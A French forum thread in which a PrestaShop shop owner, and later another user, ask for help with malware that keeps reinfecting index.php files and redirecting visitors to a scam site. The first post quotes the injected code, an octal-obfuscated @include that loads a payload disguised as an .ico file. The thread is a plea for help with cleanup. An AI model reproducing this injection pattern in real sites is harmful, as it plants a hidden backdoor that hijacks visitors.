Malware sur mon prestashop 1.7

[petergreenman]

Bonjour

J'ai depuis quelques temps un malware dont je n'arrive pas à me débarrasser et surtout trouver son origine.

 

Il rajoute régulièrement dans de nombreux fichiers index.php les lignes suivantes :

 

/*a0449*/

@include "\057hom\145/ma\147ied\151rhw\057mag\151edi\162ect\145-di\147ita\154e.c\157m/m\157dul\145s/g\141mif\151cat\151on/\143las\163es/\0563fc\142fe4\145.ic\157";

/*a0449*/
 

en début de script j'ai eu beau supprimer les .ico crée et mettre à jour tous les fichiers index infectés, changer mon mdp FTP et BDD rien n'y fait car je ne trouve pas ou il est caché le malware crée meme des fichiers index complémentaires avec juste ces ligens de codes. Pouvez vous m'aider à identifier son origine afin que je puisse m'en débarraser définitivement.

 

L'impact est que cela crée une redirection sur mon site vers un site de gain d'iphone ou autre ….

 

Merci pour votre retour

Pierre

index.php

[Janett]

Quelle est votre version de Prestashop ?

Vous avez très probablement un module vulnérable qu’il va falloir patcher ou désinstaller pour fermer la porte d’entrée

[joseantgv]

Avez-vous WordPress installé sur le même serveur?
Avez-vous installé un module "pirate"?

[doekia]

C'est je pense le moment de faire intervenir quelqu'un qui inspecte la totalité de ton code pour identifier les failles initiales mais aussi les backdoor qui ont été implantés.

C'est plusieurs heures de taf quand on a l'habitude

 

[petergreenman]

28 minutes ago, Janett said:

Quelle est votre version de Prestashop ?

Vous avez très probablement un module vulnérable qu’il va falloir patcher ou désinstaller pour fermer la porte d’entrée

Merci Janett pour votre retour rapide je suis en version 1.7.5.2 tous mes modules sont pourtant à jour

[petergreenman]

8 minutes ago, joseantgv said:

Avez-vous WordPress installé sur le même serveur?
Avez-vous installé un module "pirate"?

Bonjour oui j'ai un wordpress également sur le même serveur avec un wordfence qui m'a aussi permis de nettoyer totalement ce site mais je ne trouve pas son équivalent sous prestashop et non aucun module pirate d'installer en tout cas à ma connaissance

[petergreenman]

8 minutes ago, doekia said:

C'est je pense le moment de faire intervenir quelqu'un qui inspecte la totalité de ton code pour identifier les failles initiales mais aussi les backdoor qui ont été implantés.

C'est plusieurs heures de taf quand on a l'habitude

 

Merci pour votre retour, il n'existe pas d'autres solutions qu'une inspection totale du code car en effet cela semble très long... seriez vous capable de me proposer ce type de prestation?

[idjy]

J'ai été piratée et ils avaient installé des tâches CRON qui tripotaient mes fichiers régulièrement (je m'en suis rendue compte par hasard ; mon technicien n'avait pas pensé à regarder ça).
 

[AttackFromNowhere]

Bonjour,

Désolé de relancer ce sujet, mais j'ai exactement le même problème.

Un wordpress sur le même serveur qui a sûrement été la source du problème ...

Je nettoie les fichiers tous les jours, et le lendemain, tout recommencer, impossible de trouver la réelle source du problème ...

@petergreenman avez-vous réussi à vous en débarrasser ?

Merci.